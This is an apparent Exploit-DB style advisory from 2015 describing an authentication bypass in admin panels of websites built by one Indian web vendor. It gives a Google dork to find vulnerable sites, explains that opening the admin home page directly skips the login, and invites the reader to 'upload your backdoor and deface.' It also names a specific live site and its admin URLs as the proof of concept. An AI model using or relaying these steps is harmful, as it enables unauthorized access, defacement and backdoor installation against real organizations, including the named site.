--------------------------------------------------------------------------------------------------------------
# Exploit Title: Direct login to admin panel without entering password
# Google Dork: ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd
# Date: 2015-08-25
# Exploit Author: Aaditya Purani
# Vendor Homepage: www.dogmaindia.com
# Software Link: No software link
# Version: Dogma Soft
# Tested on: Kali Linux/ Windows 7
# CVE : Critical Vulnerability
Hello,
This is Aaditya purani and i have found a critical bug in websites which has been designed by dogmaindia.
First type the dork "ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd" in google without Double quotes(").
Then after find the site in which their is written ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd in the footer
Now, go to it's admin page http://www.targetsite.com/admin
After opening the admin panel . Follow this link http://www.targetsite.com/admin/home.php
And voila you will be directly login into the admin panel and you can also upload your backdoor and deface.
#POC:
Site: http://tirupatiitc.com/
It's admin panel : http://tirupatiitc.com/admin/
Directly login to admin panel : http://tirupatiitc.com/admin/home.php
Thank you
Contact me : https://securityresearchindia.wordpress.com
https://twitter.com/aaditya_purani